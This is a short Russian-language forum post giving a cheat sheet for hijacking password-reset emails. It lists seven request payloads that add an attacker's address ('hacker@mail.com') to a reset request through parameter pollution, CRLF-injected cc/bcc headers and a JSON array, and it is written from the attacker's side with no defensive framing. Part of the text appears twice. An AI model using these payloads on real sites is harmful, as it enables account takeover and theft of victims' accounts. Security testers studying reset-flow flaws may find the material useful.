Mutt
Professional
- Messages
- 1,056
- Reaction score
- 644
- Points
- 113
Один из стандартных способов восстановления пароля - это отправка ссылки для сброса на адрес электронной почты, к которой привязан аккаунт.
Можно попробовать перехватить запрос и добавить туда ещё один email адрес. Таким образом, на некоторых сайтах мы можем добиться отправки письма с ссылкой для сброса на подконтрольный нам адрес почты:
Добавление адреса атакующего в параметр через «&»:
Добавление адреса атакующего в параметр через «%20»:
Добавление адреса атакующего в параметр через «|»:
Добавление адреса атакующего в параметр через «cc»:
Добавление адреса атакующего в параметр через «bcc»:
Добавление адреса атакующего в параметр через «,»:
Добавление адреса атакующего в json массив:
Реальный пример такой уязвимости можно посмотреть по этой ссылке
Можно попробовать перехватить запрос и добавить туда ещё один email адрес. Таким образом, на некоторых сайтах мы можем добиться отправки письма с ссылкой для сброса на подконтрольный нам адрес почты:
Добавление адреса атакующего в параметр через «&»:
Code:
POST /resetPassword
[...]
email=victim@mail.com&email=hacker@mail.com
Code:
POST /resetPassword
[...]
email=victim@mail.com%20email=hacker@mail.com
Code:
POST /resetPassword
[...]
email=victim@mail.com|email=hacker@mail.com
Code:
POST /resetPassword
[...]
email="victim@mail.com%0d%0acc:hacker@mail.com"
Code:
POST /resetPassword
[...]
email="victim@mail.com%0d%0abcc:hacker@mail.com"
Code:
POST /resetPassword
[...]
email="victim@mail.com",email="hacker@mail.com"
Code:
POST /resetPassword
[...]
{"email":["victim@mail.com","hacker@mail.com"]}Реальный пример такой уязвимости можно посмотреть по этой ссылке
